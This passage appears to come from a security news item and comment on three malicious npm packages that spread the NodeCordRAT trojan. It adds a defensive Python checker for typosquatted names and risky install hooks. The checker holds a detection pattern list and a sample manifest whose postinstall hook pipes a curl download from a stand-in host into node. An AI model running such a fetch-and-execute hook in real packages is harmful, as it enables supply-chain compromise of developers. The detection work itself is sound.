Cybersecurity researchers recently identified three malicious npm packages uploaded by a user named wenmoonx that were designed to distribute a new remote access trojan dubbed NodeCordRAT.
Clever exploitation of developer trust in the npm ecosystem. The typosquatting approach mimicking bitcoinjs-lib combined with post-install scripts to pull the payload is textbook supply chain attack stuff. Using Discord for C2 is pragmatic since its traffic blends into normal developer workflows and encrypted channels make detection harder. Worth noting this hits at the intersection of two high-value targets: crypto developers who likely hold keys and devs building financial infrastructure.
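A pre-install check for the two signals the comment describes (a name within a couple of edits of a package on a watch-list, plus an install-time lifecycle script that fetches and executes something), written as an added example; it is not code from the original post or from any report on this campaign. The watch-list, the suspicious-pattern list, and both sample manifests are constructed for illustration, and the lookalike name `bitcoinjs-1ib` is made up: no actual package name from the campaign is used.

```python
import json
import re
from typing import Dict, List

# Lifecycle hooks that npm runs automatically during `npm install`.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Constructs a stage-two loader typically needs: a network fetch plus a way to
# execute what came back. Any one of these in an install hook deserves a look.
SUSPICIOUS_PATTERNS = [
    r"\bcurl\b", r"\bwget\b", r"\bnode\s+-e\b", r"\beval\s*\(",
    r"\bchild_process\b", r"https?://", r"\bpowershell\b",
]

# Assumed watch-list of names an attacker might imitate; extend it for your own stack.
WATCHLIST = ["bitcoinjs-lib", "ethers", "web3", "discord.js", "express"]


def levenshtein(a: str, b: str) -> int:
    """Edit distance between two strings (insert / delete / substitute)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def _strip_punct(name: str) -> str:
    return name.replace("-", "").replace("_", "").replace(".", "")


def typosquat_candidates(name: str, watchlist=WATCHLIST, max_distance: int = 2) -> List[str]:
    """Watch-list names that `name` closely resembles but is not equal to."""
    hits = []
    for target in watchlist:
        if name == target:
            continue  # the genuine package, not a lookalike
        close = levenshtein(name, target) <= max_distance
        punct_only = _strip_punct(name) == _strip_punct(target)  # e.g. "bitcoinjslib"
        if close or punct_only:
            hits.append(target)
    return hits


def suspicious_install_scripts(manifest: dict) -> Dict[str, str]:
    """Lifecycle hooks whose command contains a fetch-or-execute construct."""
    findings = {}
    for hook in INSTALL_HOOKS:
        cmd = manifest.get("scripts", {}).get(hook)
        if cmd and any(re.search(p, cmd) for p in SUSPICIOUS_PATTERNS):
            findings[hook] = cmd
    return findings


def audit_manifest(package_json: str) -> dict:
    """Audit one package.json (as text) and report why it looks risky, if at all."""
    manifest = json.loads(package_json)
    name = manifest.get("name", "")
    report = {
        "name": name,
        "typosquat_of": typosquat_candidates(name),
        "install_scripts": suspicious_install_scripts(manifest),
    }
    # A lookalike name combined with an auto-run downloader is the pairing to block outright.
    report["block"] = bool(report["typosquat_of"]) and bool(report["install_scripts"])
    return report


# Constructed sample manifests (not real packages; the lookalike name is invented).
LOOKALIKE = json.dumps({
    "name": "bitcoinjs-1ib",  # made-up lookalike: digit 1 in place of the letter l
    "version": "6.1.0",
    "scripts": {
        "postinstall": "node -e \"require('child_process').exec('curl -s https://example.invalid/stage2.js | node')\""
    },
})
BENIGN = json.dumps({
    "name": "express",
    "version": "4.19.2",
    "scripts": {"postinstall": "node scripts/print-notice.js"},  # local script, no fetch
})

if __name__ == "__main__":
    for text in (LOOKALIKE, BENIGN):
        print(json.dumps(audit_manifest(text), indent=2))
```

Run it over every `node_modules/*/package.json` after a dry install in a sandbox, or over a lockfile's resolved names, before the same install happens on a developer workstation. The benign manifest shows why the two signals are combined: a local `postinstall` on a real package name is normal and should not block, whereas a fetch-and-exec hook on a near-miss of `bitcoinjs-lib` should. Independently of this check, `npm install --ignore-scripts` (or `npm config set ignore-scripts true`) disables lifecycle hooks entirely, which removes the post-install vector at the cost of breaking packages that genuinely need a build step.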